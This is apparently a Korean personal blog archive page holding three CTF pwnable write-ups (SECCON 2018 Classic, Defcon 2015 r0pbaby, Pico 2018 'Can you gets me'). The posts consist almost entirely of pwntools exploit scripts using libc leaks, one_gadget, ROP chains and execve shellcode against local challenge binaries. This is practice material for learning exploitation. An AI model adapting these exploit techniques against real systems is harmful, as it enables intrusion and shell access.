'2019/07/28 글 목록

SECCON CTF 2018 Classic

System/Pwnable Practice 2019. 7. 28. 23:00

exploit.py

from pwn import *
  
p = process("./vuln")

e = ELF("./vuln")
l = e.libc

pr = 0x400753
main_start = 0x4006A9
one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]

payload = "A"*(0x40+8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(main_start)

p.sendlineafter(">> ",payload)
p.recvuntil("!!\n")

puts_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + one_gadget[1]

payload2 = "A"*(0x40+8)
payload2 += p64(one_addr)
p.sendlineafter(">> ",payload2)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Codegate 2016 CTF Watermelon (0)	2019.07.29
Defcon CTF 2016 Feed me (0)	2019.07.29
Defcon CTF 2015 r0pbaby (0)	2019.07.28
Pico CTF 2018 Can you gets me (0)	2019.07.28
Pico CTF 2018 Buffer Overflow 3 (0)	2019.07.27

JeonYoungSin

메모 기록용 공간

,

Defcon CTF 2015 r0pbaby

System/Pwnable Practice 2019. 7. 28. 22:13

exploit.py

from pwn import *
  
p = process('./ropbaby')
e = ELF('./ropbaby')
libc = e.libc

pop_rdi_offset = 0x000000000002155f
gets_offset = libc.symbols['gets']
one_offset = [0x4f2c5, 0x4f322, 0x10a38c]

p.sendlineafter(': ', '2')
p.sendlineafter(': ', 'gets')
gets_addr = int(p.recvline().split(' ')[2], 16)

libc_base = gets_addr - gets_offset
one_addr = libc_base + one_offset[0]

payload = 'A' * 8
payload += p64(one_addr)


p.sendlineafter(': ', '3')
p.sendlineafter(': ', str(len(payload)+1))
p.sendline(payload)

p.sendlineafter(': ', '4')
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Defcon CTF 2016 Feed me (0)	2019.07.29
SECCON CTF 2018 Classic (0)	2019.07.28
Pico CTF 2018 Can you gets me (0)	2019.07.28
Pico CTF 2018 Buffer Overflow 3 (0)	2019.07.27
Codegate 2018 CTF Quals BaskinRobins31 (0)	2019.07.24

JeonYoungSin

메모 기록용 공간

,

Pico CTF 2018 Can you gets me

System/Pwnable Practice 2019. 7. 28. 21:23

mprotect_exploit.py

from pwn import *
  
p = process("./gets")

read = 0x0806D5F0
mprotect = 0x0806E0F0
pppr = 0x80bacfe
bss = 0x080eb000
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

payload = "A"*(0x18+4)
payload += p32(read)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(shellCode))

payload += p32(mprotect)
payload += p32(pppr)
payload += p32(bss)
payload += p32(len(shellCode))
payload += p32(7)

payload += p32(bss)

p.sendlineafter("\n",payload)
sleep(0.1)
p.sendline(shellCode)
p.interactive()

syscall_exploit.py

from pwn import *
  
p = process("./gets")

gets_plt = 0x804f120
bss = 0x080eaf80
par = 0x080b81c6
pbr = 0x080481c9
pcr = 0x080de955
pdr = 0x0806f02a
syscall = 0x0806cc25
binsh = "/bin/sh\x00"

payload = "A"*(0x18+4)
payload += p32(gets_plt)
payload += p32(par)
payload += p32(bss)
payload += p32(par)
payload += p32(0xb)
payload += p32(pbr)
payload += p32(bss)
payload += p32(pcr)
payload += p32(0)
payload += p32(pdr)
payload += p32(0)
payload += p32(syscall)

p.sendlineafter("\n",payload)
sleep(0.1)
p.sendline(binsh)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

SECCON CTF 2018 Classic (0)	2019.07.28
Defcon CTF 2015 r0pbaby (0)	2019.07.28
Pico CTF 2018 Buffer Overflow 3 (0)	2019.07.27
Codegate 2018 CTF Quals BaskinRobins31 (0)	2019.07.24
Pico CTF 2013 ROP 1~4 (0)	2019.07.24

JeonYoungSin

메모 기록용 공간

,

'2019/07/28'에 해당되는 글 3건

SECCON CTF 2018 Classic

'System > Pwnable Practice' 카테고리의 다른 글

Defcon CTF 2015 r0pbaby

'System > Pwnable Practice' 카테고리의 다른 글

Pico CTF 2018 Can you gets me

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바

« 2019/07 »
일	월	화	수	목	금	토
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30	31